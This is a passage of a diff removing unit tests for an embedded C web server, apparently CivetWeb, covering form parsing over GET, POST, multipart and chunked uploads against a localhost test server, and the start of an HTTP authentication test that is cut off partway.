-	/* The check unit test library does not have build in memcmp functions. */
-	char *value = (char *)malloc(valuelen + 1);
-	ck_assert(value != NULL);
-	memcpy(value, value_untruncated, valuelen);
-	value[valuelen] = 0;
-
-	ck_assert_ptr_eq(user_data, (void *)&g_field_found_return);
-	ck_assert_int_ge(g_field_step, 0);
-
-	++g_field_step;
-	switch (g_field_step) {
-	case 1:
-		ck_assert_str_eq(key, "textin");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "text");
-		break;
-	case 2:
-		ck_assert_str_eq(key, "passwordin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 3:
-		ck_assert_str_eq(key, "radio1");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "val1");
-		break;
-	case 4:
-		ck_assert_str_eq(key, "radio2");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "val1");
-		break;
-	case 5:
-		ck_assert_str_eq(key, "check1");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "val1");
-		break;
-	case 6:
-		ck_assert_str_eq(key, "numberin");
-		ck_assert_uint_eq(valuelen, 1);
-		ck_assert_str_eq(value, "1");
-		break;
-	case 7:
-		ck_assert_str_eq(key, "datein");
-		ck_assert_uint_eq(valuelen, 8);
-		ck_assert_str_eq(value, "1.1.2016");
-		break;
-	case 8:
-		ck_assert_str_eq(key, "colorin");
-		ck_assert_uint_eq(valuelen, 7);
-		ck_assert_str_eq(value, "#80ff00");
-		break;
-	case 9:
-		ck_assert_str_eq(key, "rangein");
-		ck_assert_uint_eq(valuelen, 1);
-		ck_assert_str_eq(value, "3");
-		break;
-	case 10:
-		ck_assert_str_eq(key, "monthin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 11:
-		ck_assert_str_eq(key, "weekin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 12:
-		ck_assert_str_eq(key, "timein");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 13:
-		ck_assert_str_eq(key, "datetimen");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 14:
-		ck_assert_str_eq(key, "datetimelocalin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 15:
-		ck_assert_str_eq(key, "emailin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 16:
-		ck_assert_str_eq(key, "searchin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 17:
-		ck_assert_str_eq(key, "telin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 18:
-		ck_assert_str_eq(key, "urlin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 19:
-		ck_assert_str_eq(key, "filein");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 20:
-		ck_assert_str_eq(key, "filesin");
-		ck_assert_uint_eq(valuelen, 0);
-		ck_assert_str_eq(value, "");
-		break;
-	case 21:
-		ck_assert_str_eq(key, "selectin");
-		ck_assert_uint_eq(valuelen, 4);
-		ck_assert_str_eq(value, "opt1");
-		break;
-	case 22:
-		ck_assert_str_eq(key, "message");
-		ck_assert_uint_eq(valuelen, 23);
-		ck_assert_str_eq(value, "Text area default text.");
-		break;
-	default:
-		ck_abort_msg("field_get called with g_field_step == %i",
-		             (int)g_field_step);
-	}
-
-	free(value);
-	mark_point();
-
-	return 0;
-}
-
-
-static const char *myfile_content = "Content of myfile.txt\r\n";
-static const int myfile_content_rep = 500;
-
-
-static int
-field_store(const char *path, long long file_size, void *user_data)
-{
-	FILE *f;
-	ck_assert_ptr_eq(user_data, (void *)&g_field_found_return);
-	ck_assert_int_ge(g_field_step, 100);
-
-	++g_field_step;
-	switch (g_field_step) {
-	case 101:
-		ck_assert_str_eq(path, "storeme.txt");
-		ck_assert_int_eq(file_size, 9);
-		f = fopen(path, "r");
-		ck_assert_ptr_ne(f, NULL);
-		if (f) {
-			char buf[32] = {0};
-			int i = (int)fread(buf, 1, 31, f);
-			ck_assert_int_eq(i, 9);
-			fclose(f);
-			ck_assert_str_eq(buf, "storetest");
-		}
-		break;
-	case 102:
-		ck_assert_str_eq(path, "file2store.txt");
-		ck_assert_uint_eq(23, strlen(myfile_content));
-		ck_assert_int_eq(file_size, 23 * myfile_content_rep);
-#ifdef _WIN32
-		f = fopen(path, "rb");
-#else
-		f = fopen(path, "r");
-#endif
-		ck_assert_ptr_ne(f, NULL);
-		if (f) {
-			char buf[32] = {0};
-			int r, i;
-			for (r = 0; r < myfile_content_rep; r++) {
-				i = (int)fread(buf, 1, 23, f);
-				ck_assert_int_eq(i, 23);
-				ck_assert_str_eq(buf, myfile_content);
-			}
-			i = (int)fread(buf, 1, 23, f);
-			ck_assert_int_eq(i, 0);
-			fclose(f);
-		}
-		break;
-	default:
-		ck_abort_msg("field_get called with g_field_step == %i",
-		             (int)g_field_step);
-	}
-	mark_point();
-
-	return 0;
-}
-
-
-static int
-FormGet(struct mg_connection *conn, void *cbdata)
-{
-	const struct mg_request_info *req_info = mg_get_request_info(conn);
-	int ret;
-	struct mg_form_data_handler fdh = {field_found, field_get, NULL, NULL};
-
-	(void)cbdata;
-
-	ck_assert(req_info != NULL);
-
-	mg_printf(conn, "HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n");
-	fdh.user_data = (void *)&g_field_found_return;
-
-	/* Call the form handler */
-	g_field_step = 0;
-	g_field_found_return = FORM_FIELD_STORAGE_GET;
-	ret = mg_handle_form_request(conn, &fdh);
-	g_field_found_return = -888;
-	ck_assert_int_eq(ret, 22);
-	ck_assert_int_eq(g_field_step, 22);
-	mg_printf(conn, "%i\r\n", ret);
-	g_field_step = 1000;
-
-	mark_point();
-
-	return 1;
-}
-
-
-static int
-FormStore(struct mg_connection *conn,
-          void *cbdata,
-          int ret_expected,
-          int field_step_expected)
-{
-	const struct mg_request_info *req_info = mg_get_request_info(conn);
-	int ret;
-	struct mg_form_data_handler fdh = {field_found,
-	                                   field_get,
-	                                   field_store,
-	                                   NULL};
-
-	(void)cbdata;
-
-	ck_assert(req_info != NULL);
-
-	mg_printf(conn, "HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n");
-	fdh.user_data = (void *)&g_field_found_return;
-
-	/* Call the form handler */
-	g_field_step = 100;
-	g_field_found_return = FORM_FIELD_STORAGE_STORE;
-	ret = mg_handle_form_request(conn, &fdh);
-	ck_assert_int_eq(ret, ret_expected);
-	ck_assert_int_eq(g_field_step, field_step_expected);
-	mg_printf(conn, "%i\r\n", ret);
-	g_field_step = 1000;
-
-	mark_point();
-
-	return 1;
-}
-
-
-static int
-FormStore1(struct mg_connection *conn, void *cbdata)
-{
-	mark_point();
-	return FormStore(conn, cbdata, 3, 101);
-}
-
-
-static int
-FormStore2(struct mg_connection *conn, void *cbdata)
-{
-	mark_point();
-	return FormStore(conn, cbdata, 4, 102);
-}
-
-
-static void
-send_chunk_stringl(struct mg_connection *conn,
-                   const char *chunk,
-                   unsigned int chunk_len)
-{
-	char lenbuf[16];
-	size_t lenbuf_len;
-	int ret;
-
-	mark_point();
-
-	/* First store the length information in a text buffer. */
-	sprintf(lenbuf, "%x\r\n", chunk_len);
-	lenbuf_len = strlen(lenbuf);
-
-	/* Then send length information, chunk and terminating \r\n. */
-	ret = mg_write(conn, lenbuf, lenbuf_len);
-	ck_assert_int_eq(ret, (int)lenbuf_len);
-
-	ret = mg_write(conn, chunk, chunk_len);
-	ck_assert_int_eq(ret, (int)chunk_len);
-
-	ret = mg_write(conn, "\r\n", 2);
-	ck_assert_int_eq(ret, 2);
-}
-
-
-static void
-send_chunk_string(struct mg_connection *conn, const char *chunk)
-{
-	mark_point();
-	send_chunk_stringl(conn, chunk, (unsigned int)strlen(chunk));
-	mark_point();
-}
-
-
-START_TEST(test_handle_form)
-{
-	struct mg_context *ctx;
-	struct mg_connection *client_conn;
-	const struct mg_request_info *ri;
-	const char *OPTIONS[8];
-	const char *opt;
-	int opt_idx = 0;
-	char ebuf[100];
-	const char *multipart_body;
-	const char *boundary;
-	size_t body_len, body_sent, chunk_len;
-	int sleep_cnt;
-
-	mark_point();
-
-	memset((void *)OPTIONS, 0, sizeof(OPTIONS));
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8884";
-	ck_assert_int_le(opt_idx, (int)(sizeof(OPTIONS) / sizeof(OPTIONS[0])));
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 1] == NULL);
-	ck_assert(OPTIONS[sizeof(OPTIONS) / sizeof(OPTIONS[0]) - 2] == NULL);
-
-	ctx = test_mg_start(NULL, &g_ctx, OPTIONS);
-
-	ck_assert(ctx != NULL);
-	g_ctx = ctx;
-
-	opt = mg_get_option(ctx, "listening_ports");
-	ck_assert_str_eq(opt, "8884");
-
-	mg_set_request_handler(ctx, "/handle_form", FormGet, NULL);
-	mg_set_request_handler(ctx, "/handle_form_store", FormStore1, NULL);
-	mg_set_request_handler(ctx, "/handle_form_store2", FormStore2, NULL);
-
-	test_sleep(1);
-
-	/* Handle form: "GET" */
-	client_conn = mg_download("localhost",
-	                          8884,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /handle_form"
-	                          "?textin=text&passwordin=&radio1=val1"
-	                          "&radio2=val1&check1=val1&numberin=1"
-	                          "&datein=1.1.2016&colorin=%2380ff00"
-	                          "&rangein=3&monthin=&weekin=&timein="
-	                          "&datetimen=&datetimelocalin=&emailin="
-	                          "&searchin=&telin=&urlin=&filein="
-	                          "&filesin=&selectin=opt1"
-	                          "&message=Text+area+default+text. "
-	                          "HTTP/1.0\r\n"
-	                          "Host: localhost:8884\r\n"
-	                          "Connection: close\r\n\r\n");
-	ck_assert(client_conn != NULL);
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST x-www-form-urlencoded" */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form HTTP/1.1\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: application/x-www-form-urlencoded\r\n"
-	                "Content-Length: 263\r\n"
-	                "\r\n"
-	                "textin=text&passwordin=&radio1=val1&radio2=val1"
-	                "&check1=val1&numberin=1&datein=1.1.2016"
-	                "&colorin=%2380ff00&rangein=3&monthin=&weekin="
-	                "&timein=&datetimen=&datetimelocalin=&emailin="
-	                "&searchin=&telin=&urlin=&filein=&filesin="
-	                "&selectin=opt1&message=Text+area+default+text.");
-	ck_assert(client_conn != NULL);
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST multipart/form-data" */
-	multipart_body =
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"textin\"\r\n"
-	    "\r\n"
-	    "text\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"passwordin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"radio1\"\r\n"
-	    "\r\n"
-	    "val1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=radio2\r\n"
-	    "\r\n"
-	    "val1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"check1\"\r\n"
-	    "\r\n"
-	    "val1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"numberin\"\r\n"
-	    "\r\n"
-	    "1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"datein\"\r\n"
-	    "\r\n"
-	    "1.1.2016\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"colorin\"\r\n"
-	    "\r\n"
-	    "#80ff00\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"rangein\"\r\n"
-	    "\r\n"
-	    "3\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"monthin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"weekin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"timein\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"datetimen\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"datetimelocalin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"emailin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"searchin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"telin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"urlin\"\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"filein\"; filename=\"\"\r\n"
-	    "Content-Type: application/octet-stream\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=filesin; filename=\r\n"
-	    "Content-Type: application/octet-stream\r\n"
-	    "\r\n"
-	    "\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"selectin\"\r\n"
-	    "\r\n"
-	    "opt1\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388\r\n"
-	    "Content-Disposition: form-data; name=\"message\"\r\n"
-	    "\r\n"
-	    "Text area default text.\r\n"
-	    "--multipart-form-data-boundary--see-RFC-2388--\r\n";
-	body_len = strlen(multipart_body);
-	ck_assert_uint_eq(body_len, 2368); /* not required */
-
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "POST /handle_form HTTP/1.1\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Content-Length: %u\r\n"
-	                "\r\n%s",
-	                (unsigned int)body_len,
-	                multipart_body);
-
-	ck_assert(client_conn != NULL);
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Handle form: "POST multipart/form-data" with chunked transfer encoding */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form HTTP/1.1\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-
-	ck_assert(client_conn != NULL);
-
-	body_len = strlen(multipart_body);
-	chunk_len = 1;
-	body_sent = 0;
-	while (body_len > body_sent) {
-		if (chunk_len > (body_len - body_sent)) {
-			chunk_len = body_len - body_sent;
-		}
-		ck_assert_int_gt((int)chunk_len, 0);
-		mg_printf(client_conn, "%x\r\n", (unsigned int)chunk_len);
-		mg_write(client_conn, multipart_body + body_sent, chunk_len);
-		mg_printf(client_conn, "\r\n");
-		body_sent += chunk_len;
-		chunk_len = (chunk_len % 40) + 1;
-	}
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST multipart/form-data" with chunked transfer
-	 * encoding, using a quoted boundary string */
-	client_conn = mg_download(
-	    "localhost",
-	    8884,
-	    0,
-	    ebuf,
-	    sizeof(ebuf),
-	    "%s",
-	    "POST /handle_form HTTP/1.1\r\n"
-	    "Host: localhost:8884\r\n"
-	    "Connection: close\r\n"
-	    "Content-Type: multipart/form-data; "
-	    "boundary=\"multipart-form-data-boundary--see-RFC-2388\"\r\n"
-	    "Transfer-Encoding: chunked\r\n"
-	    "\r\n");
-
-	ck_assert(client_conn != NULL);
-
-	body_len = strlen(multipart_body);
-	chunk_len = 1;
-	body_sent = 0;
-	while (body_len > body_sent) {
-		if (chunk_len > (body_len - body_sent)) {
-			chunk_len = body_len - body_sent;
-		}
-		ck_assert_int_gt((int)chunk_len, 0);
-		mg_printf(client_conn, "%x\r\n", (unsigned int)chunk_len);
-		mg_write(client_conn, multipart_body + body_sent, chunk_len);
-		mg_printf(client_conn, "\r\n");
-		body_sent += chunk_len;
-		chunk_len = (chunk_len % 40) + 1;
-	}
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Now test form_store */
-
-	/* First test with GET */
-	client_conn = mg_download("localhost",
-	                          8884,
-	                          0,
-	                          ebuf,
-	                          sizeof(ebuf),
-	                          "%s",
-	                          "GET /handle_form_store"
-	                          "?storeme=storetest"
-	                          "&continue_field_handler=ignore"
-	                          "&break_field_handler=abort"
-	                          "&dontread=xyz "
-	                          "HTTP/1.0\r\n"
-	                          "Host: localhost:8884\r\n"
-	                          "Connection: close\r\n\r\n");
-
-	ck_assert(client_conn != NULL);
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Handle form: "POST x-www-form-urlencoded", chunked, store */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form_store HTTP/1.0\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: application/x-www-form-urlencoded\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-	ck_assert(client_conn != NULL);
-
-	send_chunk_string(client_conn, "storeme=store");
-	send_chunk_string(client_conn, "test&");
-	send_chunk_string(client_conn, "continue_field_handler=ignore");
-	send_chunk_string(client_conn, "&br");
-	test_sleep(1);
-	send_chunk_string(client_conn, "eak_field_handler=abort&");
-	send_chunk_string(client_conn, "dontread=xyz");
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-	/* Handle form: "POST multipart/form-data", chunked, store */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form_store HTTP/1.0\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-	ck_assert(client_conn != NULL);
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary");
-	send_chunk_string(client_conn, "--see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"storeme\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "storetest\r\n");
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary-");
-	send_chunk_string(client_conn, "-see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"continue_field_handler\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "ignore\r\n");
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary-");
-	send_chunk_string(client_conn, "-see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"break_field_handler\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "abort\r\n");
-
-	send_chunk_string(client_conn, "--multipart-form-data-boundary-");
-	send_chunk_string(client_conn, "-see-RFC-2388\r\n");
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"dontread\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "xyz\r\n");
-	send_chunk_string(client_conn, "--multipart-form-data-boundary");
-	send_chunk_string(client_conn, "--see-RFC-2388--\r\n");
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Handle form: "POST multipart/form-data", chunked, store, with files */
-	client_conn =
-	    mg_download("localhost",
-	                8884,
-	                0,
-	                ebuf,
-	                sizeof(ebuf),
-	                "%s",
-	                "POST /handle_form_store2 HTTP/1.0\r\n"
-	                "Host: localhost:8884\r\n"
-	                "Connection: close\r\n"
-	                "Content-Type: multipart/form-data; "
-	                "boundary=multipart-form-data-boundary--see-RFC-2388\r\n"
-	                "Transfer-Encoding: chunked\r\n"
-	                "\r\n");
-	ck_assert(client_conn != NULL);
-
-	boundary = "--multipart-form-data-boundary--see-RFC-2388\r\n";
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"storeme\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "storetest\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"continue_field_handler\";");
-	send_chunk_string(client_conn, "filename=\"file_ignored.txt\"\r\n");
-	send_chunk_string(client_conn, "Content-Type: ");
-	send_chunk_string(client_conn, "application/octet-stream\r\n");
-	send_chunk_string(client_conn, "X-Ignored-Header: xyz\r\n");
-	send_chunk_string(client_conn, "\r\n");
-
-	/* send some kilobyte of data */
-	/* sending megabytes to localhost does not allways work in CI test
-	 * environments (depending on the network stack) */
-	body_sent = 0;
-	do {
-		send_chunk_string(client_conn, "ignore\r\n");
-		body_sent += 8;
-		/* send some strings that are almost boundaries */
-		for (chunk_len = 1; chunk_len < strlen(boundary); chunk_len++) {
-			/* chunks from 1 byte to strlen(boundary)-1 */
-			send_chunk_stringl(client_conn, boundary, (unsigned int)chunk_len);
-			body_sent += chunk_len;
-		}
-	} while (body_sent < 8 * 1024);
-	send_chunk_string(client_conn, "\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"file2store\";");
-	send_chunk_string(client_conn, "filename=\"myfile.txt\"\r\n");
-	send_chunk_string(client_conn, "Content-Type: ");
-	send_chunk_string(client_conn, "application/octet-stream\r\n");
-	send_chunk_string(client_conn, "X-Ignored-Header: xyz\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	for (body_sent = 0; (int)body_sent < (int)myfile_content_rep; body_sent++) {
-		send_chunk_string(client_conn, myfile_content);
-	}
-	send_chunk_string(client_conn, "\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"break_field_handler\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "abort\r\n");
-
-	send_chunk_string(client_conn, boundary);
-	send_chunk_string(client_conn, "Content-Disposition: form-data; ");
-	send_chunk_string(client_conn, "name=\"dontread\"\r\n");
-	send_chunk_string(client_conn, "\r\n");
-	send_chunk_string(client_conn, "xyz\r\n");
-	send_chunk_string(client_conn, "--multipart-form-data-boundary");
-	send_chunk_string(client_conn, "--see-RFC-2388--\r\n");
-	mg_printf(client_conn, "0\r\n");
-
-	for (sleep_cnt = 0; sleep_cnt < 30; sleep_cnt++) {
-		test_sleep(1);
-		if (g_field_step == 1000) {
-			break;
-		}
-	}
-	ri = mg_get_request_info(client_conn);
-
-	ck_assert(ri != NULL);
-	ck_assert_str_eq(ri->local_uri, "200");
-	mg_close_connection(client_conn);
-
-
-	/* Close the server */
-	g_ctx = NULL;
-	test_mg_stop(ctx);
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_http_auth)
-{
-#if !defined(NO_FILES)
-	const char *OPTIONS[] = {
-		"document_root",
-		".",
-		"listening_ports",
-		"8080",
-#if !defined(NO_CACHING)
-		"static_file_max_age",
-		"0",
-#endif
-		"put_delete_auth_file",
-		"put_delete_auth_file.csv",
-		NULL,
-	};
-
-	struct mg_context *ctx;
-	struct mg_connection *client_conn;
-	char client_err[256], nonce[256];
-	const struct mg_request_info *client_ri;
-	int client_res;
-	FILE *f;
-	const char *passwd_file = ".htpasswd";
-	const char *test_file = "test_http_auth.test_file.txt";
-	const char *test_content = "test_http_auth test_file content";
-	const char *domain;
-	const char *doc_root;
-	const char *auth_request;
-	const char *str;
-	size_t len;
-	int i;
-	char HA1[256], HA2[256], HA[256];
-	char HA1_md5_buf[33], HA2_md5_buf[33], HA_md5_buf[33];
-	char *HA1_md5_ret, *HA2_md5_ret, *HA_md5_ret;
-	const char *nc = "00000001";
-	const char *cnonce = "6789ABCD";
-
-	mark_point();
-
-	/* Start with default options */
-	ctx = test_mg_start(NULL, NULL, OPTIONS);
-
-	ck_assert(ctx != NULL);
-	domain = mg_get_option(ctx, "authentication_domain");
-	ck_assert(domain != NULL);
-	len = strlen(domain);
-	ck_assert_uint_gt(len, 0);
-	ck_assert_uint_lt(len, 64);
-	doc_root = mg_get_option(ctx, "document_root");
-	ck_assert_str_eq(doc_root, ".");
-
-	/* Create a default file in the document root */
-	f = fopen(test_file, "w");
-	if (f) {
-		fprintf(f, "%s", test_content);
-		fclose(f);
-	} else {
-		ck_abort_msg("Cannot create file %s", test_file);
-	}
-
-	(void)remove(passwd_file);
-	(void)remove("put_delete_auth_file.csv");
-
-	client_res = mg_modify_passwords_file("put_delete_auth_file.csv",
-	                                      domain,
-	                                      "admin",
-	                                      "adminpass");
-	ck_assert_int_eq(client_res, 1);
-
-	/* Read file before a .htpasswd file has been created */
-	memset(client_err, 0, sizeof(client_err));
-	client_conn =
-	    mg_connect_client("127.0.0.1", 8080, 0, client_err, sizeof(client_err));
-
-	ck_assert_str_eq(client_err, "");
-	ck_assert(client_conn != NULL);
-
-	mg_printf(client_conn, "GET /%s HTTP/1.0\r\n\r\n", test_file);
-	client_res =
-	    mg_get_response(client_conn, client_err, sizeof(client_err), 10000);
-	ck_assert_int_ge(client_res, 0);
-	ck_assert_str_eq(client_err, "");
-	client_ri = mg_get_request_info(client_conn);
-	ck_assert(client_ri != NULL);
-
-	ck_assert_str_eq(client_ri->local_uri, "200");
-	client_res = (int)mg_read(client_conn, client_err, sizeof(client_err));
